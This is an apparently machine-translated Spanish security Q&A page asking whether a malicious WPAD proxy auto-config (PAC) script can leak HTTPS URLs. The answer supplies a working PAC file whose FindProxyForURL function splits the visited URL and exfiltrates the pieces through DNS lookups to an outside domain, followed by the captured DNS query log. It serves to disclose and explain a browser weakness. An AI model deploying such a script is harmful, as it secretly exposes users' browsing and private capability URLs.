¿Puede el autodiscovery de proxy web filtrar las URL de HTTPS?

Navega tus respuestas
3

El protocolo WPAD puede permitir que un atacante haga que los atacantes usen un malicioso PAC script.

Parece estar bien documentado, esto puede ser usado para realizar ataques MITM en el tráfico HTTP. Sin embargo, no veo ninguna discusión sobre el impacto en el tráfico HTTPS.

Por lo que puedo decir, no permite un ataque MITM completo en el tráfico HTTPS ya que la secuencia de comandos PAC solo puede dirigir el navegador al proxy que se va a usar, pero todavía habrá un extremo a extremo. Conexión SSL entre el cliente y el servidor legítimo.

Sin embargo, uno de los argumentos para la función FindProxyForURL proporcionada por el atacante es la URL completa. Además, FindProxyForURL puede activar búsquedas de DNS.

¿Puede un atacante utilizar esto para filtrar las URL de HTTPS? Si no es así, ¿qué protección se aplica para evitar este tipo de fugas?

    
pregunta kasperd 04.05.2015 - 23:49
fuente

1 respuesta

5

Sí, la URL se pasa a FindProxyForURL() y puede filtrarla a través de DNS. Aquí hay un ejemplo de archivo PAC: 

function FindProxyForURL(url, host) {
    if (host == 'navalny.com') {
        var chunks = url.match(/[-a-zA-Z0-9]+/g);
        dnsResolve('x.darkk.net.ru.');
        if (chunks) {
            chunks.forEach(function(x) {
                dnsResolve(x + '.y.darkk.net.ru');
            });
        }
        dnsResolve('z.darkk.net.ru.');
        return 'SOCKS5 127.0.0.1:1024'; // drop connection
    }
    return 'DIRECT';
}

Si Firefox / 39.0 navega a https://navalny.com/the-capability-url?q=q mientras este archivo PAC está activo, se envían las siguientes consultas de DNS: 

Standard query 0xfb5d  A x.darkk.net.ru
Standard query 0x9ca7  AAAA x.darkk.net.ru
Standard query 0xf1cc  A x.darkk.net.ru
Standard query 0xf60c  AAAA x.darkk.net.ru
Standard query 0x574a  A https.y.darkk.net.ru
Standard query 0xfad9  AAAA https.y.darkk.net.ru
Standard query 0x2289  A https.y.darkk.net.ru
Standard query 0x7ed4  AAAA https.y.darkk.net.ru
Standard query 0x85b2  A navalny.y.darkk.net.ru
Standard query 0xa7cd  AAAA navalny.y.darkk.net.ru
Standard query 0x1ca9  A navalny.y.darkk.net.ru
Standard query 0xa400  AAAA navalny.y.darkk.net.ru
Standard query 0xec51  A com.y.darkk.net.ru
Standard query 0x1ea7  AAAA com.y.darkk.net.ru
Standard query 0x25bd  A the-capability-url.y.darkk.net.ru
Standard query 0x844c  AAAA the-capability-url.y.darkk.net.ru
Standard query 0x200b  A q.y.darkk.net.ru
Standard query 0x5a62  AAAA q.y.darkk.net.ru
Standard query 0xeb02  A q.y.darkk.net.ru
Standard query 0xaa2c  AAAA q.y.darkk.net.ru
Standard query 0xee8f  A z.darkk.net.ru
Standard query 0xe9b7  AAAA z.darkk.net.ru
    
respondido por el darkk 27.07.2015 - 11:09
fuente

Lea otras preguntas en las etiquetas

Estoy "Shell Shocked" (secuencia de comandos remota descargada y ejecutada). ¿Puedo prohibir las descargas de archivos como medida de seguridad? ¿Cómo mantener los registros a salvo de los atacantes?